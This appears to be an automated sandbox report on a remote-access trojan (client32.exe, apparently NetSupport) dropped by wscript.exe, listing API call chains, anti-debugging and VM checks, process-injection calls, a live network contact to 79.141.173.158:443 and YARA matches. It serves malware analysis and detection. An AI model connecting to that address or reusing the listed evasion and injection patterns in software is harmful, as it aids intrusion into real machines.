Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	4_2_1106ABD0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F890F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6F890F84
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F88EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6F88EFE1
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F890B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6F890B33
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F88CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	4_2_6F88CA9B
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F890702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6F890702
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F88C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	4_2_6F88C775
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	5_2_111273E0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	5_2_1102D9F4
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	5_2_1102DD21
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	5_2_1110BD70
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	5_2_110663B0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	5_2_1106ABD0

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_6F8B6C74 _resetstkoflw,VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,

4_2_6F8B6C74

Source: client32.exe	Binary or memory string: VMware
Source: wscript.exe, 00000000.00000003.1936184278.00000291B3DD1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: client32.exe	Binary or memory string: VMWare

Source: C:\ProgramData\o2xqxqs\client32.exe	API call chain: ExitProcess graph end node	graph_4-88800
Source: C:\ProgramData\o2xqxqs\client32.exe	API call chain: ExitProcess graph end node	graph_4-86507
Source: C:\ProgramData\o2xqxqs\client32.exe	API call chain: ExitProcess graph end node	graph_4-89587
Source: C:\ProgramData\o2xqxqs\client32.exe	API call chain: ExitProcess graph end node	graph_4-86478
Source: C:\ProgramData\o2xqxqs\client32.exe	API call chain: ExitProcess graph end node
Source: C:\ProgramData\o2xqxqs\client32.exe	API call chain: ExitProcess graph end node

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_11162BB7

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,

4_2_110B7F30

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_6F8B6C74 VirtualProtect ?,-00000001,00000104,?

4_2_6F8B6C74

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_11146010 _memset,GetVersionExA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDefaultLangID,

4_2_11146010

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

4_2_1117D104

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	4_2_110934A0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,	4_2_11031780
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_11162BB7
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_1116EC49
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F8BADFC _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,	4_2_6F8BADFC
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F840807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	4_2_6F840807
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	5_2_110934A0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,	5_2_11031780
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_11162BB7
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_1116EC49
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C6628E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_6C6628E1
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C6687F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6C6687F5

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: pcicapi.dll.0.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 79.141.173.158 443

Jump to behavior

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 5_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,

5_2_110F4990

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_11113190 GetKeyState,DeviceIoControl,keybd_event,

4_2_11113190

Source: C:\Windows\System32\wscript.exe

Process created: C:\ProgramData\o2xqxqs\client32.exe "C:\ProgramData\o2xqxqs\client32.exe"

Jump to behavior

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,

4_2_110F37A0

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,

4_2_1109ED30

Source: client32.exe	Binary or memory string: Shell_TrayWnd
Source: client32.exe	Binary or memory string: Progman

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	4_2_11174BCC
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoA,	4_2_1116C24E
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	4_2_11174796
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_111746A1
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	4_2_1117483D
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	4_2_11174898
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_11174B29
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_11174B90
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	4_2_11174A69
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,	4_2_6F84888A
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,	4_2_6F84871C
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,	4_2_6F8486FD
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,	4_2_6F8485AC
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,	4_2_6F8465F0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,	4_2_6F848468
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	5_2_11174898
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	5_2_11174B29
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	5_2_11174BCC
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoA,	5_2_1116C24E
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	5_2_11174796
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_111746A1
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	5_2_1117483D
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	5_2_11174B90
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	5_2_11174A69
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	5_2_6C672089
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	5_2_6C672175
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: EnumSystemLocalesA,	5_2_6C672151
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	5_2_6C6721DC
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	5_2_6C672218
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	5_2_6C67DC56
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_6C671CC1
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoA,	5_2_6C67DC99
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	5_2_6C671DB6
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	5_2_6C671E5D
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	5_2_6C671EB8
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	5_2_6C67DB7C

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\o2xqxqs.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,

4_2_110F37A0

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_110A1460 GetLocalTime,

4_2_110A1460

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_1103BA70 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,

4_2_1103BA70

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

4_2_1117594C

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,

4_2_11145C70

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	4_2_11070430
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	5_2_11070430
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C64A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,	5_2_6C64A980

Source: Yara match	File source: 5.2.client32.exe.73ac0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.client32.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.73ac0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.client32.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.6f8f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.client32.exe.6f8f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.client32.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.client32.exe.6c640000.3.unpack, type: UNPACKEDPE
